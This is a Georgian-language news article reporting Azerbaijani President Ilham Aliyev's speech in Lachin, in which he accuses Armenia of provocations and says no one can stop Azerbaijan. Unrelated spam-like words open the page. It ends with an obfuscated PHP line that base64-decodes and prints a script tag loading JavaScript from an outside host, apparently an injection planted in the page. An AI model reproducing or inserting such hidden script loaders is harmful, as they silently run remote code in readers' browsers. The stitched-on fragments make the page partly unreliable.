celsiusi
ავერსი შნაიდერი

ვერავის ზარი, ვერანაირი განცხადება, ვერანაირი ინიციატივა ვერ შეგვაჩერებს, – აღნიშნულის შესახებ აზერბაიჯანის პრეზიდენტმა, ილჰამ ალიევმა ქალაქ ლაჩინში სიტყვით გამოსვლისას განაცხადა.

ალიევის თქმით, ბოლო თვეების განმავლობაში აზერბაიჯანის წინააღმდეგ არაერთხელ განხორციელდა სამხედრო პროვოკაცია. მისი განცხადებით, მხოლოდ ლაჩინის რაიონის ტერიტორიაზე 1 400-ზე მეტი ახალი ნაღმი იქნა განთავსებული, რომელთა ამოქმედების შედეგად აზერბაიჯანის 240-ზე მეტი მოქალაქე დაიღუპა ან მძიმედ დაშავდა.

„ანუ ჩვენს წინააღმდეგ ომი გრძელდება, ჩვენი მოქალაქეები იღუპებიან. შეგვიძლია ეს დავუშვათ? არასოდეს. ჩვენ არაერთხელ გავაფრთხილეთ სომხეთი, უარი თქვას ამ ბინძურ ქმედებებზე, წინააღმდეგ შემთხვევაში ინანებს. შედეგად, როდესაც 13 სექტემბერს ჩვენს წინააღმდეგ მორიგი პროვოკაცია განხორციელდა, აზერბაიჯანის არმიამ უპასუხა და მტერს კვლავ უკუაგდო. იმედი მაქვს, ეს მათ საბოლოოდ გაკვეთილად გამოდგება, რადგან დარწმუნდნენ, რომ არავინ და არაფერი შეგვაჩერებს. ვერავის ზარი, ვერანაირი განცხადება, ვერანაირი ინიციატივა ვერ შეგვაჩერებს. ჩვენ ჩვენს მიწაზე ვართ და ვიცავთ მას”, – განაცხადა ალიევმა.

ილჰამ ალიევის თქმით, ყარაბაღის მეორე ომის დასრულების შემდეგ აზერბაიჯანელები სომხეთის საზღვრებამდე გავიდნენ და სომხეთის მხრიდან მათ ტერიტორიაზე შეჭრაში დადანაშაულებას უსაფუძვლო უწოდა.

„ჯერ ერთი, საზღვარი რომ იყო იქ, სადაც ამბობენ, შექმნიდნენ სასაზღვრო ხაზებს, კომუნიკაციებს და განახორციელებდნენ საინჟინრო სამუშაოებს. ისინი თვლიდნენ, რომ მთელი ყარაბაღი და ზანგეზური მათ დარჩებოდათ. ამიტომ მათ არანაირი სამუშაო არ გაუკეთებიათ აზერბაიჯან-სომხეთის საზღვარზე. ჩვენი საზღვრის დელიმიტაციის გარეშე ვერავინ იტყვის, სად გადის ის. კიდევ ერთხელ მინდა ვთქვა, რომ ჩვენ მზად ვართ დისკუსიებისთვის და პასუხისმგებლობით ვეკიდებით დელიმიტაციის კომისიების მუშაობას – აზერბაიჯანულ-სომხური კომისიების მუშაობას”, – განაცხადა ალიევმა.

აზერბაიჯანის პრეზიდენტის თქმით, აზერბაიჯანს არ სურს ომი და ამიტომაც 30 წელი აწარმოებდა მოლაპარაკებებს, მაგრამ, ალიევის განცხადებით, თუ სომხეთი გააგრძელებს პროვოკაციებს, ბაქო მათ ღირსეულად უპასუხებს.

„ჩვენ არ გვსურს და არ გვსურდა ომი. ამიტომ ჩვენ მოლაპარაკებებს ვაწარმოებთ თითქმის 30 წელი. მაგრამ თუ მტერი ჩვენს წინააღმდეგ პროვოკაციებს ჩაიდენს, ჩვენ ღირსეულ პასუხს გავცემთ. დღეს სომხეთი კარგად უნდა დაფიქრდეს. ულტიმატუმის ენით ნურავინ დაგველაპარაკება და არავის იმედი არ ჰქონდეთ. კიდევ ერთხელ მინდა ვთქვა, რომ ვერავინ და ვერაფერი შეგვიშლის ხელს. ჩვენ შევძელით მთელ მსოფლიოსთვის გვეჩვენებინა, რისი უნარი გვაქვს, ჩვენ გავათავისუფლეთ ჩვენი მიწები სამხედრო გზით და ვამაყობთ ამით“, – განაცხადა ალიევმა.

470
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");